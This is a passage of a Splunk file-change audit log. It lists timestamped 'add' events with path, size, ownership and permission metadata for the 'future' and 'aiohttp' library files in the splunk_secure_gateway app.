action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/dbm", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.253, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/copyreg.py", isdir=0, size=438, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.250, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/configparser.py", isdir=0, size=146, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.244, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/collections.py", isdir=0, size=417, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.240, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/builtins.py", isdir=0, size=281, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.236, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/_thread.py", isdir=0, size=163, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-rw-rw-", hash=] Audit:[timestamp=10-06-2022 17:42:26.231, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/_markupbase.py", isdir=0, size=171, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.228, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/_dummy_thread.py", isdir=0, size=175, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.221, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves/__init__.py", isdir=0, size=220, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:26.015, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/utils", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/types", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.006, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/tests", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:26.001, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/standard_library", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:25.997, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/moves", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:25.993, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/builtins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:25.988, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/backports", isdir=1, size=4096, gid=41812, uid=41812, modtime="Fri Apr 2 17:55:11 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:25.982, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/future/__init__.py", isdir=0, size=2991, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.875, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/worker.cpython-37.pyc", isdir=0, size=6862, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.871, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/typedefs.cpython-37.pyc", isdir=0, size=1297, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/tracing.cpython-37.pyc", isdir=0, size=14218, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/tcp_helpers.cpython-37.pyc", isdir=0, size=1086, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.858, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/streams.cpython-37.pyc", isdir=0, size=18241, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.855, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/signals.cpython-37.pyc", isdir=0, size=1272, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.852, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/resolver.cpython-37.pyc", isdir=0, size=3767, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.847, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/payload_streamer.cpython-37.pyc", isdir=0, size=3192, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.841, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/payload.cpython-37.pyc", isdir=0, size=13142, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.835, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/multipart.cpython-37.pyc", isdir=0, size=26068, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.831, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/log.cpython-37.pyc", isdir=0, size=433, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.827, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/locks.cpython-37.pyc", isdir=0, size=1660, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.822, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/http_writer.cpython-37.pyc", isdir=0, size=4928, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.817, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/http_websocket.cpython-37.pyc", isdir=0, size=14637, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.813, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/http_parser.cpython-37.pyc", isdir=0, size=15828, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.810, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/http_exceptions.cpython-37.pyc", isdir=0, size=4280, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.807, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/http.cpython-37.pyc", isdir=0, size=1228, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.803, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/helpers.cpython-37.pyc", isdir=0, size=22674, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.799, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/hdrs.cpython-37.pyc", isdir=0, size=3608, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.795, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/frozenlist.cpython-37.pyc", isdir=0, size=2644, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.790, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/formdata.cpython-37.pyc", isdir=0, size=4435, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/cookiejar.cpython-37.pyc", isdir=0, size=9291, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.780, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/connector.cpython-37.pyc", isdir=0, size=30832, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.776, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/client_ws.cpython-37.pyc", isdir=0, size=8718, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.772, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/client_reqrep.cpython-37.pyc", isdir=0, size=27313, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.768, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/client_proto.cpython-37.pyc", isdir=0, size=6031, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/client_exceptions.cpython-37.pyc", isdir=0, size=10356, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.760, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/client.cpython-37.pyc", isdir=0, size=28359, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/base_protocol.cpython-37.pyc", isdir=0, size=2629, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/abc.cpython-37.pyc", isdir=0, size=8229, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.747, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/__pycache__/__init__.cpython-37.pyc", isdir=0, size=3697, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:09 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:25.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/worker.py", isdir=0, size=8022, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.539, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_ws.py", isdir=0, size=16783, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.535, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_urldispatcher.py", isdir=0, size=39532, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.530, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_server.py", isdir=0, size=2058, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.526, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_runner.py", isdir=0, size=11194, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.522, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_routedef.py", isdir=0, size=6109, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.518, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_response.py", isdir=0, size=26202, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.515, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_request.py", isdir=0, size=26454, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.510, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_protocol.py", isdir=0, size=23251, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.506, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_middlewares.py", isdir=0, size=4193, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.500, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_log.py", isdir=0, size=7498, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.496, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_fileresponse.py", isdir=0, size=9025, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.492, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_exceptions.py", isdir=0, size=10106, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.486, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web_app.py", isdir=0, size=17053, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/web.py", isdir=0, size=17881, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.479, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/typedefs.py", isdir=0, size=1374, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.475, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/tracing.py", isdir=0, size=14363, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.471, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/test_utils.py", isdir=0, size=20253, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.467, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/tcp_helpers.py", isdir=0, size=962, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/streams.py", isdir=0, size=20530, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/signals.pyi", isdir=0, size=319, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/signals.py", isdir=0, size=852, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/resolver.py", isdir=0, size=4608, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/pytest_plugin.py", isdir=0, size=11009, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.443, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/py.typed", isdir=0, size=7, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.439, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/payload_streamer.py", isdir=0, size=2102, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.436, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/payload.py", isdir=0, size=13333, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.432, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/multipart.py", isdir=0, size=32251, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/log.py", isdir=0, size=325, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.424, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/locks.py", isdir=0, size=1220, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/http_writer.py", isdir=0, size=5341, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/http_websocket.py", isdir=0, size=25098, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/http_parser.py", isdir=0, size=30781, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.410, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/http_exceptions.py", isdir=0, size=2586, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.406, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/http.py", isdir=0, size=1824, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.402, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/helpers.py", isdir=0, size=22918, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.397, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/hdrs.py", isdir=0, size=3446, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.394, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/frozenlist.pyi", isdir=0, size=1434, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.390, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/frozenlist.py", isdir=0, size=1718, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.386, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/formdata.py", isdir=0, size=6080, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/cookiejar.py", isdir=0, size=12163, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.376, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/connector.py", isdir=0, size=42968, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.372, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/client_ws.py", isdir=0, size=10287, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.368, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/client_reqrep.py", isdir=0, size=36439, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.365, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/client_proto.py", isdir=0, size=8163, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.360, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/client_exceptions.py", isdir=0, size=8529, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/client.py", isdir=0, size=43916, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/base_protocol.py", isdir=0, size=2701, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.346, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/abc.py", isdir=0, size=5247, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_websocket.pyx", isdir=0, size=1561, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.338, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_websocket.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=112712, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_websocket.c", isdir=0, size=137427, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.330, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_http_writer.pyx", isdir=0, size=4200, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.326, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_http_writer.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=269752, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.323, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_http_writer.c", isdir=0, size=213020, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_http_parser.pyx", isdir=0, size=29022, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_http_parser.cpython-37m-x86_64-linux-gnu.so", isdir=0, size=1975216, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.311, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/lib/aiohttp/_http_parser.c", isdir=0, size=1011524, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:25.306, user=n/a, 